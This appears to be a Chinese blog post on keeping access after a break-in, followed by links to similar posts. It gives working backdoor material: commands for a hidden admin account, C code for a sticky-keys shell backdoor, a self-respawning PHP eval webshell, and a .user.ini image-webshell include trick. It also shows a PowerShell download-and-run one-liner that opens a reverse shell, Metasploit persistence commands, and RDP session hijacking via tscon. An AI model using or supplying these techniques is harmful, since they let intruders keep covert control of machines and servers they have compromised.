后渗透权限维持的方法

最新推荐文章于 2024-07-03 16:35:30 发布
最新推荐文章于 2024-07-03 16:35:30 发布
阅读量4.3k 收藏 16
点赞数
分类专栏: 后门技巧 文章标签: 后渗透维持权限的一些方法
原文链接:http://mp.weixin.qq.com/s?__biz=MzI2OTMzNjg4OQ==&mid=2247484644&idx=1&sn=d9dfa9572866b0b0a1ecb7ec846e6d5e&chksm=eae0acb2dd9725a4dd91359d65716b637230cd1489548e9ba8deb2137f4d9d0ba26464ea8f76&mpshare=1&scene=23&srcid=&sharer_sharetime=1569409467342&sharer_sh
版权

一、影子账户

net user admin$ admin /add

具体可以通过注册表查找
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\Users\Names
在默认情况下,隐藏用户的查看是隐藏的。

解决方法:在SAM文件夹处点击右键—>权限(设置就好了)

二、shift后门
1、先删除缓存C:\WINDOWS\system32\dllcache\sethc.exe
2、C:\WINDOWS\system32\cmd.exe 将其复制并将名称更改为 sethc.exe
代码:

#include<cstdio>
#include<cstring>
#include<cstdlib>
#include<conio.h>
int main(void)
{
    char welcome[1700] = " \n\
    Please input your password! \n\
    password : ";
    while(1){
        char password[30];
        char pwd[30] = "adexx!@#QWE";
        printf("%s",welcome);
        puts("");
        printf("你输入的密码:");
        scanf("%s",password);
        if(strncmp(password,pwd,11) == 0){
            system("cmd.exe");
        }else{
            printf("%s","Error\n");
            fflush(stdin);
        }
    }
    return 0;
}

注. 这里种shift后门目标是2008的机器的话 那么可以用2003的远程连接工具进行连接

三、不死马(web层面的权限维持)

1、事先隐藏后门文件操作:右键-》属性-》隐藏

2、将木马名字进行伪装处理,伪装成系统文件或者报错文件。修改时间跟系统文件时间类似。

3、利用循环不死马(举栗子)

<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
while(1){
	file_put_contents('phpinf0.php','<?php $a=array($_REQUEST["kk"]=>"3");
	$b=array_keys($a)[0];
	eval($b);?>');
	sleep(8);
}
?>

说明:此脚本会每8秒不断的向服务器生成一个“phpinf0.php”的一句话木马.

四:利用.user.ini文件自动包含木马文件

利用成功前提下必须有以下三个文件,
1、PHP的正常文件
2、修改后.user.ini文件
3、luomiweixiong.gif木马

创建一个文件夹test
1、test.php 内容为 <?php echo 1;?>

2、luomiweixiong.gif 内容为<?php if(@$_GET['shell']=='test'){phpinfo();}?>

3、在“.user.ini”文件写入: auto_prepend_file=luomiweixiong.gif

浏览器访问:http://127.0.0.1/test/test.php?shell=test
则出现的为phpinfo()函数执行的效果

原理:
https://www.php.net/manual/zh/configuration.file.per-user.php

在 .user.ini 风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置可被识别

这里就很清楚了,.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。(上面表格中没有提到的PHP_INI_PERDIR也可以在.user.ini中设置)

实际上 这里面没有说完整,其实除了PHP_INI_SYSTEM以外的模式(包括PHP_INI_ALL)都是可以通过.user.ini来设置的。

其中有个配置项auto_prepend_file就可以被利用导致后门的生成

auto_prepend_file:指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。 使用方法很简单,直接写在.user.ini中

隐藏知识:某网站限制不允许上传.php文件,你便可以上传一个.user.ini,再上传一个图片马,包含起来进行getshell。不过前提是含有.user.ini的文件夹下需要有正常的php文件,否则也不能包含了。 再比如,你只是想隐藏个后门,这个方式是最方便的。

五、Powershell权限维持
参考此PowerShell脚本
https://github.com/re4lity/Schtasks-Backdoor

执行代码:powershell.exe-exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('http://192.168.124.25/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor-method nccat -ip 192.168.124.14 -port 666 -time 2"

说明:
1、192.168.124.25为受害者IP,前提是要把PowerShell脚本放到受害者服务器能访问到的根路径。
2、192.168.124.14为接收反弹回来的IP,可用NC监听反弹回来的shell

六、metasploit权限维持(老生常谈直接操作就好了哈)

1、Persistence模块
前提是利用MSF获取到了对方的会话
run persistence -U -i 12 -p 6666 -r 192.168.124.14

说明
-i 目标自动回连时间
-p 设置目标反向连接的端口
-r 设置目标反向连接的ip地址
-U 设置目标自启动
加入自启动后,就算受害者机器再次启动也能弹回shell

2、metsvc 模块
前提是利用MSF获取到了对方的会话
run metsvc -A

说明:

-A 自动启动一个匹配的 multi/handler 以连接到该服务
该模块是在受害者服务器开启了一个“Meterpreter”服务
下次攻击者可以利用metsvc_bind_tcp监听模块就可以再次获取到shell
监听端口为31337

七、会话劫持

说明:RDP会话劫持是在不知道另一用户密码的条件下进行切换用户登录

query user
sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4"
net start sesshijack

tscon 参数为query user命令中的所要劫持ID参数
dest: 为你当前用户的会话名

小鱼儿waha
关注
  • 0
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
windows/android后门的维持
qq_2411772106的博客
08-09 593
搭建环境:kali linux,MSF windons后门维持 // 先创建一个后门payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 -f exe > /root/Desktop/windowsPayload.exe // 打开msf控制台,并完成相关设置 msfconsole use exploit/multi/handler set payload windows/meterpr
渗透——权限维持
FisrtBqy的博客
04-26 2156
权限维持 1 Windows权限维持 1.1 用户维持(克隆账号) 1.1.1 添加一般隐藏用户的方式 net user username$ passwd /add 使用net user命令查看用户,发现没有username$这个用户 但是通过控制面板→管理账户中可以看到该用户。 1.1.2 注册表克隆用户隐藏 需要先完成上一步🙄 打开注册表编辑器:Win+R→regedit,找到如下路径: 发现SAM路径下没有权限查看,这里修改权限:菜单栏编辑→权限,修改后F5刷新
windows内网渗透--权限维持
最新发布
weixin_47099592的博客
07-03 655
scr 文件实际上是一个可执行文件,类似于 .exe 文件。它们可以包含相同的代码,并且可以执行相同的任务。注释掉#source /etc/network/interfaces.d/*这个见我上一篇文章,这个还有个思路就是劫持后可以写一个添加管理员用户。将Administrator账户所复制的值,粘贴到hack。成功实现最基础的windows run注册表持久化。攻击机 kali 192.168.1.100。复制Administrator 中的F键值。接下来我们实现最简单的windows持久化。
渗透阶段的权限维持
Fly_鹏程万里
08-22 2603
前言 当我们在渗透过程中通过漏洞获取到目标主机权限后,往往会因为服务器管理员发现和修补漏洞而导致对服务器权限的丢失,所以权限维持就显得很重要了。 在windows主机中,我总结了下面几种权限维持方法,不足之处还望各位大佬斧正。 添加影子账户 影子账户可以理解为和主体一模一样但是又看不见的账户,其隐蔽性较好,只能在注册表里面看到。 首先,我们需要创建一个隐藏账号OMG$ 使用命令 net...
一种后渗透阶段权限维持的老方法
Fly_鹏程万里
09-24 397
项目地址:https://github.com/Al1ex/Monitor 项目概览:
渗透权限维持——隐藏用户的创建和使用(全程干货)
MachineGunJoe666
05-24 1355
0x00 前言 在渗透过程中拿下一台主机后很多时候会选择开3389进远程桌面查看一下对方主机内有无一些有价值的东西可以利用,但是这也引出了一个问题,只要是登录进程就一定会留下痕迹,虽然在渗透完成后可以通过痕迹清理的方法清除自己登录的"证据",但是在多次渗透的过程中我不禁产生了思考,有没有一种方法能够最大化的隐藏自己登陆过对方主机呢,于是便有了下文 0x01 隐藏用户(影子用户)的创建与利用进行权限维持 这里先提一个概念,在windows环境下创建用户如果后面带了一个"$"符号,在ne...
权限维持方法浅析.pdf
08-08
前情提要& 本集简介 Golden Ticket Silver Ticket SID History SID History -Golden Ticket Now More GOLDEN! Directory Service Restore Mode (DSRM) DSRM -Pass The Hash&DCSync Malicious Security Support ...
内网渗透之windows权限维持
07-18
【标题】"内网渗透之windows权限维持"揭示了网络安全领域的一个重要话题——在Windows操作系统环境中如何保持已获得的权限,以便进行深度的系统分析或恶意活动。这通常涉及到对系统内部工作原理的理解,以及利用特定...
渗透测试-后渗透阶段.pdf
02-25
这个阶段的操作主要包括但不限于信息的收集、权限的提升、维持对系统的控制、以及清除攻击痕迹等等。 在后渗透阶段,Metasploit工具是一个非常重要的组成部分。Metasploit是一个开源的安全漏洞测试工具,它可以帮助...
NetDLLSpy:.NET后渗透下的权限维持,附下载DLL
04-27
.NET下妙用DLL+处理映射实现后渗透权限维持Ivan@360云影实验室2018年07月18日0x01 前言话说笔者在探索.NET实现一句话木马系列中在使用一般处理程序(当然也不限于ashx,asmx照样可用)的时候发现一处功能点可以...
Linux后渗透--权限维持十式(附检测及清除手段)
weixin_44155363的博客
06-15 2448
0x01:SSH 一、ssh软连接 SSH软连接后门的原理 1、Linux软连接ssh后门需要ssh配置允许PAM认证才能使用 2、将sshd文件软连接名称设置为su,这样应用在启动过程中他会去PAM配置文件夹中寻找是否存在对应名称的配置信息(su) 3、如果被控主机不允许root登陆可用其他已存在用户登陆 4、通过软连接的方式,实质上PAM认证是通过软连接的文件名(如:/tmp/su,/home/su)在/etc/pam.d/目录下寻找对应的PAM配置文件(如:/etc/pam.d/su) 5、任意密码登
windows系统后渗透阶段权限维持方法小结
闵行小鱼塘
07-02 605
归纳下windows系统维持权限方法
web端权限维持
wodafa的博客
02-27 1298
前言 关于权限维持,我之前写过一篇基于系统端的后门技术文章,如映像劫持啊,lpk之类。当然啦,在拿到权限后,在web端做手脚也是个好办法。 PS:还是希望论坛早点支持markdown哦,不然排版很是费劲。 内容目录: - 构造文件包含漏洞 - 隐蔽性脚本木马 - 构造sql注入点 正文 0x01 构造文件包含漏洞 >**本部分概览:** > * 基本的文
渗透之各种维持权限的后门原理即利用
p_utao的博客
09-13 3624
前言 在拿到最高权限后,我们就应该建立后门(backdoor)了,以维持对目标主机的控制权,这样一来,即使我们所利用的漏洞被补丁程序修复了,还可以通过后门继续控制目标系统。 后门简单来说就是一个留在目标主机上的系统,它可以使攻击者随时连接到目标主机,大多数情况下,后门是一个运行在目标主机上的隐藏进程,它允许一个普通的、未授权的用户控制计算机。 操作系统后门 后门泛指绕过目标系统安全控制体系的正规用户认证过程,从而维持我们对目标系统的控制权,以及隐匿控制行为的方法。Meterpreter提供 了Persis
Android后门GhostCtrl,完美控制设备任意权限并窃取用户数据
weixin_33676492的博客
07-19 233
Android系统似乎已经成为世界各地病毒作者的首选目标,每天都有新的恶意软件在感染更多的设备。 这一次,安全公司趋势科技发布警告,他们发现了一个新的Android后门——GhostCtrl GhostCtrl被发现有3个版本,第一代窃取信息并控制一些设备的功能,第二代增加了更多的功能来劫持设备,第三代结合了早期的版本特性,功能更加强大,...
权限维持——获取登陆账号及安装后门程序
cxrpty的博客
03-12 850
当攻击者获取服务器权限后,通常会采用一些后门技术来维持自己当前得到的权限,服务器一旦被植入后门,那么攻击者下次进入就方便多了。由于攻击可能被发现,会清除一些shell,导致目标丢失,所以需要留下后门来维持权限,达到持续控制的目的。 实验一:获取windows系统登录账号 实验环境:windows2008 windows系统登陆账号存储位置:C:\Windows\System32\confi...
权限维持:常用后门
f_carey的博客
12-18 1382
权限维持:常用后门1 粘滞键后门1.1 粘滞键1.1.1 设置粘滞键后门1.2 配置开启远程桌面连接1.3 详细建议阅读此处文章2 注册表后门2.1 用注册表添加 nc 后门(metepreter)3 计划任务后门3.1 PowerSploit 中计划任务后门4 WMI 型后门4.1 防御 WMI 型后门5 WEB 后门5.1 weevely5.2 webacoo 后门 配合 Windows 提权文章 1 粘滞键后门 1.1 粘滞键 windows 系统下连续按 5 次 shift 可调出粘滞键功能,粘滞键
权限维持-影子用户后门
god_Zeo的安全博客
10-12 275
0x00 前提 水一篇内网东西,主要针对一种情况:抓到 hash 解不开, 又不想 pth, 就想直接登桌面 0x01权限维持-影子用户后门 影子账户,古老但有效! 原理 代 $ 符号的用户名不会显示出来,仔通导出注册表,并修改F值,克隆账号,再删除账号 效果 net user无法删除,需要删除注册表相关键值; Windows 的登录界面不显示该用户信息。 0x02 简单实用 ShadowUser.exe admin administrator 可以正常登录,桌面什么也是克隆的administrat
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值